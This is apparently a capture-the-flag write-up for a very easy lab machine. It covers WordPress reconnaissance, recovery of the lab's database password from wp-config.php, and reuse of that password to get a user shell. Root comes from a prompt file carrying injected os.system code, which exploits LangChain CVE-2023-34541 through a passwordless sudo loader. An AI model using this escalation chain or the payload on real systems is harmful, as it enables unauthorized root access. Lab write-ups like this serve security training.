2023 Business CTF: Lagmon

#htb #ctf #fullpwn #wordpress #rce #prompt-injection #cve-2023-34541

Challenge Information

AttributeDetails
Event2023 Business CTF
CategoryFullPwn
ChallengeLagmon
DifficultyVery Easy

Summary

A WordPress-based system running LangChain integration with a vulnerable prompt loader. Initial access is obtained through WordPress enumeration and database credential discovery, followed by privilege escalation via LangChain prompt injection vulnerability (CVE-2023-34541) to achieve root code execution.

Analysis

The system has multiple layers:

WordPress Setup:

  • Version 6.2.2 (latest as of 2023-05-20)
  • Astra theme 4.1.5
  • Database credentials exposed in wp-config.php

Database Credentials:

DB_NAME: pwndb
DB_USER: wordpress_user
DB_PASSWORD: SNJQvwWHCK
DB_HOST: localhost

Privilege Escalation:

  • User developer reuses database password for system account
  • User can execute /opt/prompt_loader.py with sudo without password
  • Prompt loader uses LangChain’s PromptTemplate with CommaSeparatedListOutputParser

Solution

Step 1: Initial Reconnaissance

Terminal window
nmap -sC -sV langmon.htb
# Reveals WordPress 6.2.2 on port 80
wpscan --url http://langmon.htb

Step 2: Discover WordPress Credentials

  • Access wp-admin or web root to find wp-config.php
  • Extract database credentials: SNJQvwWHCK

Step 3: Gain User Shell

Terminal window
su developer
# Password: SNJQvwWHCK
cat /home/developer/user.txt
# HTB{4lw4y5_upd473_y0ur_plu61n5}

Step 4: Exploit LangChain CVE-2023-34541 Create a malicious prompt file:

prompt.py
from langchain.output_parsers.list import CommaSeparatedListOutputParser
from langchain.prompts.prompt import PromptTemplate


_DECIDER_TEMPLATE = """..."""


import os
os.system('id')  # Injected code


PROMPT = PromptTemplate(
    input_variables=["query", "table_names"],
    template=_DECIDER_TEMPLATE,
    output_parser=CommaSeparatedListOutputParser(),
)

Step 5: Execute with Sudo

Terminal window
sudo /opt/prompt_loader.py prompt.py
# Returns: uid=0(root) gid=0(root) groups=0(root)
# Access to root flag: HTB{7h3_m4ch1n35_5p34k_w3_h34r}

Key Takeaways

  • WordPress installations require careful configuration management
  • Reusing passwords across systems creates lateral movement paths
  • LangChain prompt templates can be exploited for code injection
  • Sudo privileges without proper output validation enable privilege escalation
  • Keep all software, especially plugins, updated
  • Never hardcode credentials in configuration files
  • LLM integrations introduce new attack surfaces
  • Sanitize all external inputs to prompt templates